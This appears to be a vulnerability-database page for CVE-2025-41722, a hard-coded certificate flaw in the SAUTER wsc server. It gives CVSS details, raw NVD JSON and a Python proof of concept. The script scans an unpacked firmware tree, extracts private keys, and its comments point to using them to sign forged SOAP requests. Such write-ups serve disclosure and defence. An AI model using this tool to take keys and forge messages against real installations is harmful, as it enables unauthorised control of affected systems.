Security Vulnerability Report
CVE-2025-41722 CVSS 7.5 HIGH

CVE-2025-41722

Published: 2025-10-22 07:15:34
Last Modified: 2026-04-15 00:35:42

Description

The wsc server uses a hard-coded certificate to check the authenticity of SOAP messages. An unauthenticated remote attacker can extract private keys from the Software of the affected devices.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAUTER wsc Server (for the specific affected versions, see the official security advisory vde-2025-060)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
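#!/usr/bin/env python3
# CVE-2025-41722 - SAUTER wsc Server Hard-coded Certificate Private Key Extraction
# This PoC demonstrates extraction of hard-coded private keys from the affected software
"""Find private-key material shipped inside an unpacked software/firmware tree.

The script walks a directory, tries to parse every file with a certificate or
key extension as a private key (PEM, DER, then PKCS#12) and writes each key it
can load next to the source file as ``<file>.extracted_key.pem``.

Reading the result: a private key that parses out of a vendor-shipped package
is the hard-coded credential condition (CWE-798) this CVE describes. The same
key is present in every copy of that package, so it cannot be treated as a
secret; consult the vendor advisory (vde-2025-060) for affected versions.
"""
import os
import sys
import zipfile  # unused here: the target must already be unpacked
import tarfile  # unused here: the target must already be unpacked

try:
    import OpenSSL.crypto as crypto
except ImportError:
    # Keep the module importable so main() can report the missing dependency
    # instead of dying with a traceback.
    crypto = None

# Suffix of the files this script writes; skipped on later scans so a re-run
# does not re-process (and re-suffix) its own output.
OUTPUT_SUFFIX = ".extracted_key.pem"
PKCS12_SUFFIXES = (".p12", ".pfx")


def search_files(root_path, extensions):
    """Recursively search for certificate and key files.

    Args:
        root_path: Directory to walk.
        extensions: Iterable of filename suffixes to match (case-sensitive).

    Returns:
        List of paths whose name ends with one of ``extensions``, excluding
        files previously written by this script.
    """
    suffixes = tuple(extensions)
    found_files = []
    for dirpath, _dirnames, filenames in os.walk(root_path):
        for filename in filenames:
            if filename.endswith(OUTPUT_SUFFIX):
                continue
            if filename.endswith(suffixes):
                found_files.append(os.path.join(dirpath, filename))
    return found_files


def _write_private_key(path, key_pem):
    """Write key bytes to ``path``, created with owner-only permissions.

    The mode argument only applies when the file is created; an existing file
    keeps whatever permissions it already has.
    """
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as out:
        out.write(key_pem)


def extract_private_key(key_file, password=None):
    """Extract private key from a file.

    Args:
        key_file: Path of the candidate file.
        password: Optional passphrase (``str`` or ``bytes``).

    Returns:
        The private key re-encoded as PEM bytes, or ``None`` when the file
        cannot be read or does not parse as PEM, DER or PKCS#12.

    Raises:
        RuntimeError: pyOpenSSL is not installed.
    """
    if crypto is None:
        raise RuntimeError("pyOpenSSL is required to parse key files")

    try:
        with open(key_file, 'rb') as f:
            key_data = f.read()
    except OSError as e:
        print(f"Error processing {key_file}: {e}")
        return None

    # pyOpenSSL expects the passphrase as bytes (or a callable), not str.
    if isinstance(password, str):
        password = password.encode("utf-8")

    # A failed parse only means "not this format", so each attempt is
    # best-effort and falls through to the next one.

    # Try PEM format
    try:
        if password:
            pkey = crypto.load_privatekey(crypto.FILETYPE_PEM, key_data, password)
        else:
            pkey = crypto.load_privatekey(crypto.FILETYPE_PEM, key_data)
        return crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey)
    except Exception:
        pass

    # Try DER format
    try:
        pkey = crypto.load_privatekey(crypto.FILETYPE_ASN1, key_data)
        return crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey)
    except Exception:
        pass

    # Try PKCS12 format. load_pkcs12 is deprecated and absent from recent
    # pyOpenSSL releases; say so instead of reporting "no key" by accident.
    load_pkcs12 = getattr(crypto, "load_pkcs12", None)
    if load_pkcs12 is None:
        if key_file.endswith(PKCS12_SUFFIXES):
            print(f"[!] PKCS#12 parsing is not available in this pyOpenSSL; "
                  f"{key_file} was not inspected")
        return None
    try:
        p12 = load_pkcs12(key_data, password)
        return crypto.dump_privatekey(crypto.FILETYPE_PEM, p12.get_privatekey())
    except Exception:
        pass

    return None


def main():
    """Scan the directory given on the command line and save every key found."""
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_software_or_firmware>")
        sys.exit(1)

    if crypto is None:
        print("[!] pyOpenSSL is not installed; it is required to parse key files")
        sys.exit(1)

    target_path = sys.argv[1]
    # NOTE(review): .cer/.crt normally hold certificates only, and .jks files
    # are matched but no loader below understands Java keystores, so those are
    # always reported as containing no key.
    extensions = ['.pem', '.key', '.p12', '.pfx', '.der', '.cer', '.crt', '.jks']

    print(f"[*] Searching for certificate/key files in: {target_path}")
    found = search_files(target_path, extensions)

    if not found:
        print("[!] No certificate or key files found.")
        sys.exit(1)

    print(f"[*] Found {len(found)} potential certificate/key files")

    for f in found:
        print(f"\n[*] Analyzing: {f}")
        key_pem = extract_private_key(f)
        if key_pem:
            output = f + OUTPUT_SUFFIX
            try:
                _write_private_key(output, key_pem)
            except OSError as e:
                # e.g. read-only mount of the unpacked image
                print(f"Error writing {output}: {e}")
                continue
            print(f"[+] Private key extracted to: {output}")
            print("[!] This key can be used to forge SOAP messages to the wsc server")


if __name__ == "__main__":
    main()

# Usage example:
# python3 exploit.py /path/to/sauter_wsc_software/
# After extracting the key, use it to sign SOAP requests to the target wsc server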

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41722", "sourceIdentifier": "[email protected]", "published": "2025-10-22T07:15:33.640", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The wsc server uses a hard-coded certificate to check the authenticity of SOAP messages. An unauthenticated remote attacker can extract private keys from the Software of the affected devices."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json", "source": "[email protected]"}]}}